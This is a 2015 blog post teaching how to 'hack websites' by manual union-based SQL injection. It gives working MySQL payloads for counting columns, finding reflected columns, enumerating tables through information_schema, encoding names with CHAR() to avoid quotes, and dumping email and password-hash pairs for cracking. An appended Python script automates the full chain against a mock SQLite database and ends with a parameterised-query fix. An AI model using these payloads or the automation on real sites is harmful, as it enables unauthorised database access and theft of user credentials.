Thursday, 19 February 2015

How to hack websites using Manual SQL injection

Hello friends, today we are going to learn how to hack a website using manual SQL injection.
The website we will be using in this demo is:

So, here is the vulnerable link: '100

So lets begin :

Step 1: First we have to find the number of columns returned by the vulnerable query (not the number in the whole database: "order by" only sees the columns of the SELECT the page runs). To do that, append an "order by" clause to the vulnerable parameter. Example: order by 7 (the number is a guess; keep adjusting it until you find the limit. I am using 13.)

*Remember: if "order by 7" gives an error, the query has fewer than 7 columns; if you get the normal page back, it has at least 7 columns, so try a higher number. The highest number that still returns the normal page is the column count. In my case the number of columns is 13.

Step 2: After getting the column count, it's time to find the vulnerable column by using "UNION SELECT" with the numbers 1 up to the column count, one after another, separated by commas (,). For the numbers to show up, the original query must return no row (a non-existent id, such as a negative value, is the usual way), so the UNION row is what the page displays; whichever numbers appear on the page mark the columns you can read data through. See the example for more clarification:

Example: ,2,3,4,5,6,7,8,9,10,11,12,13--

Step 3: In my case I got 4 and 7 as the vulnerable columns (we will use column 4). We can inject our queries in place of the 4: @@version gives the MySQL version, database() gives the name of the current database.

Example: UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12,13-- (for getting the version)
UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13-- (for getting the database)

Step 4: Now that we have the version as well as the database name, it's time to search for the tables. For that we replace the 4 with group_concat(table_name) and append from information_schema.tables where table_schema=database(), so that only the tables of the current database are listed. Example: UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--

Step 5: Now it's time to get the columns of the users table. We need the table name written as a MySQL CHAR() expression for this, so that the payload carries no quote characters (which are often escaped or filtered). Replace table_name with column_name and information_schema.tables with information_schema.columns where table_name=CHAR(...). CHAR(109, 101, 109, 98, 101, 114, 115, 104, 105, 112) spells "membership", the table picked from the step 4 output; look through the result for the user and password columns. Example: UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(109, 101, 109, 98, 101, 114, 115, 104, 105, 112)--

Step 6: Final step: getting the usernames and passwords out of the columns found in step 5. Remove everything from information_schema onwards and instead select group_concat(email,0x3a,phone) from the membership table; 0x3a is a hex-encoded colon, used as the separator so that the payload still needs no quotes. Just replace email and phone with whatever your target's username and password columns are called. The password will come back as an MD5 hash; MD5 is a hash, not encryption, so it cannot be decrypted, but it can be cracked with a wordlist or looked up in a precomputed table. Example: UNION SELECT 1,2,3,group_concat(email,0x3a,phone),5,6,7,8,9,10,11,12,13 from membership--
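To show the whole chain of steps 1 to 6 working end to end, here is an added example (my own code, not from the original post or the site it targets). It runs the enumeration against a constructed stand-in for the vulnerable site: an in-memory SQLite database behind a page function that splices the id parameter straight into its query, with only columns 4 and 7 rendered, mirroring the "vulnerable columns" above. It then shows the same payload failing against a parameterised version of the page. SQLite has no information_schema, @@version or multi-argument group_concat, so those payloads use SQLite equivalents (sqlite_master, || with char(58)) where MySQL differs; the ORDER BY probe, the UNION marker row and the CHAR() trick are the ones the post describes. All table names, column names and data are hypothetical.

```python
"""Added example, not code from the original post: the union-based
enumeration of steps 1-6 run against a constructed stand-in for the
vulnerable site, followed by the parameterised fix.  The stand-in is an
in-memory SQLite database behind a page function that splices the id
parameter into its query.  SQLite has no information_schema, @@version
or multi-argument group_concat, so those payloads use SQLite equivalents
(sqlite_master, || with char(58)); the ORDER BY probe, the UNION marker
row and the CHAR() trick are as in the post.  All names and data are
hypothetical."""
import hashlib
import re
import sqlite3

# Constructed schema: a 13-column articles table behind the vulnerable
# page, and the membership table the post finds, with MD5 password hashes.
ARTICLE_COLS = ["id", "title", "body", "author"] + [f"extra{i}" for i in range(5, 14)]
USERS = [("admin@example.com", "555-0100", hashlib.md5(b"letmein").hexdigest()),
         ("bob@example.com", "555-0101", hashlib.md5(b"hunter2").hexdigest())]
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE articles (id INTEGER, " + ", ".join(ARTICLE_COLS[1:]) + ")")
conn.execute("INSERT INTO articles VALUES (100, 'Welcome', 'Hello', 'editor'" + ", NULL" * 9 + ")")
conn.execute("CREATE TABLE membership (id INTEGER, email, phone, pass)")
conn.executemany("INSERT INTO membership VALUES (?, ?, ?, ?)",
                 [(i + 1, *u) for i, u in enumerate(USERS)])
QUERY_PREFIX = "SELECT " + ", ".join(ARTICLE_COLS) + " FROM articles WHERE id="


def render(rows):
    # Only columns 4 and 7 reach the HTML: the post's "vulnerable columns".
    return "\n".join(f"col4={r[3]}\ncol7={r[6]}" for r in rows)


def vulnerable_page(user_input):
    """The defect: user input concatenated into SQL.  None stands for the error page."""
    try:
        return render(conn.execute(QUERY_PREFIX + user_input).fetchall())
    except sqlite3.OperationalError:
        return None


def safe_page(user_input):
    """The fix: bind the parameter, so any payload is just a value that matches no id."""
    return render(conn.execute(QUERY_PREFIX + "?", (user_input,)).fetchall())


def find_column_count(page, max_cols=50):
    """Step 1: ORDER BY n renders normally while n <= column count and errors beyond it."""
    n = 1
    while n <= max_cols and page(f"100 ORDER BY {n}") is not None:
        n += 1
    return n - 1


def union_payload(ncols, col, expr, tail=""):
    """Steps 2-6 share this shape: id=-100 matches no article, so the page
    renders the UNION row, with `expr` placed in reflected column `col`."""
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[col - 1] = expr
    return f"-100 UNION SELECT {','.join(parts)} {tail}--"


def find_reflected_columns(page, ncols):
    """Step 2: whichever marker numbers show up on the page are readable columns."""
    text = page(union_payload(ncols, 1, "1")) or ""   # plain marker row 1..ncols
    return sorted(int(m) for m in re.findall(r"^col\d+=(\d+)$", text, re.M))


def read_through(page, ncols, col, expr, tail=""):
    """Evaluate `expr` server-side and read its value back out of column `col`."""
    text = page(union_payload(ncols, col, expr, tail)) or ""
    m = re.search(rf"^col{col}=(.*)$", text, re.M)
    return m.group(1) if m else ""


def char_call(s):
    """Step 5's trick: a string literal spelled as CHAR(...) carries no quote characters."""
    return "CHAR(" + ",".join(str(ord(c)) for c in s) + ")"


def list_tables(page, ncols, col):
    """Step 4 (SQLite stand-in for information_schema.tables WHERE table_schema=database())."""
    return read_through(page, ncols, col, "group_concat(name)",
                        f"FROM sqlite_master WHERE type={char_call('table')}").split(",")


def table_definition(page, ncols, col, table):
    """Step 5 (SQLite stand-in for information_schema.columns): the CREATE statement,
    which lists the column names, selected by CHAR()-encoded table name."""
    return read_through(page, ncols, col, "sql",
                        f"FROM sqlite_master WHERE name={char_call(table)}")


def dump_credentials(page, ncols, col):
    """Step 6: email:hash pairs.  MySQL spelling: group_concat(email,0x3a,pass)."""
    return read_through(page, ncols, col, "group_concat(email||char(58)||pass)",
                        "FROM membership").split(",")


if __name__ == "__main__":
    n = find_column_count(vulnerable_page)
    col = find_reflected_columns(vulnerable_page, n)[0]
    print("columns:", n, "reflected:", find_reflected_columns(vulnerable_page, n))
    print("tables:", list_tables(vulnerable_page, n, col))
    print("membership:", table_definition(vulnerable_page, n, col, "membership"))
    print("creds:", dump_credentials(vulnerable_page, n, col))
    print("same payload against the fixed page:", dump_credentials(safe_page, n, col))
```

The probe in find_column_count stops at the first ORDER BY that errors, which is exactly the "error means fewer columns, normal page means at least that many" rule from step 1. Against safe_page the bound value never becomes SQL, so the marker numbers never appear and dump_credentials comes back empty; that is the whole fix, and it needs no blacklist of keywords or quotes.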

# Any problem in understanding or execution? Comment below.

